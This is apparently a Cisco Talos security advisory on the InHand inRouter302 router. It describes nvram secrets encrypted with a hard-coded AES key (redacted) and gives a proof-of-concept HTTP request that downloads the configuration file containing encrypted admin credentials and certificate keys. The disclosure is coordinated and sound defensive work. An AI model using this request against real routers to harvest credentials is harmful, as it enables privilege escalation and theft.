The inRouter302 offers several functionalities where the secrecy of the data is essential. But the majority of data are saved into the nvram configuration file, which is downloadable by any logged-in users. For this reason, some of the nvram entries are encrypted. The function that encrypt the entry value is aes_encrypt_str:

    undefined4 aes_encrypt_str(char *data_in,int len,char *data_out)
    
    {
      [...]
      IV._0_4_ = 0;
      __size = len + 0xfU & 0xfffffff0;
      IV._4_4_ = 0;
      IV._8_4_ = 0;
      IV._12_4_ = 0;
      data_in_copy = crypto_dup(data_in,len,__size);
      if (data_in_copy == 0) {
        uVar1 = 0xffffffff;
      }
      else {
        data_out_temp = malloc(__size);
        if (data_out_temp == (void *)0x0) {
          [...]
        }
        else {
          AES_set_key(AES_key,<REDACTED>,0x80);                                                             [1]
          uVar1 = IH_AES_cbc_encrypt(AES_key,data_in_copy,data_out_temp,__size,IV,1);                       [2]
          bin2str(data_out_temp,__size,data_out);
          free(data_in_copy);
          free(data_out_temp);
        }
      }
      return uVar1;
    }
    

The aes_encrypt_str function sets the AES key at [1] and then encrypts the provided string at [2]. The AES key at [1] is hard-coded. An attacker that is able to obtain the encrypted string could use the AES key at [1] to decrypt those.

**Exploit Proof of Concept**

Following the request to download the nvram configuration file:

    GET /config.dat?type=config HTTP/1.1
    Host: 192.168.2.1
    Cookie: web_session=2edc3370
    Connection: close
    

The router reply will be:

    HTTP/1.0 200 OK
    Date: Mon, 06 Jul 2020 12:16:42 GMT
    Content-Type: application/octent-stream
    Cache-Control: no-cache, no-store, must-revalidate, private
    Expires: Thu, 31 Dec 1970 00:00:00 GMT
    Pragma: no-cache
    Connection: close
    
    #BEGIN-CONFIG TIMESTAMP:1594037762
    [...]
    adm_passwd=$AES$664C98C2428A8DA4B7E39345A8E29967
    adm_user=adm
    adm_users=$AES$7453839E7CEBBFF515F60FAB57781B45
    [...]
    cert_private=$AES$2EDA91DB0EB549AD1B6DBB[...]
    cert_key=$AES$73E3FEF28D45C1CD652FECE871B7C624
    [...]
    

For instance, we can see that: adm_passwd, adm_users, cert_private and cert_key are nvram entries with AES-encrypted values. A low-privileged user could download the configuration file and get this information. For instance, one consequence would be for a low-privileged user to obtain the privileged user credentials.

**Vendor Response**

The vendor has updated their website and uploaded the latest firmware on it. https://inhandnetworks.com/product-security-advisories.html https://www.inhandnetworks.com/products/inrouter300.html#link4

https://www.inhandnetworks.com/upload/attachment/202205/10/InHand-PSA-2022-01.pdf

**Timeline**

2022-03-02 - Vendor Disclosure  
2022-05-10 - Public Release  
2022-05-10 - Vendor Patch Release  

Discovered by Francesco Benvenuto of Cisco Talos.

Tag

#intel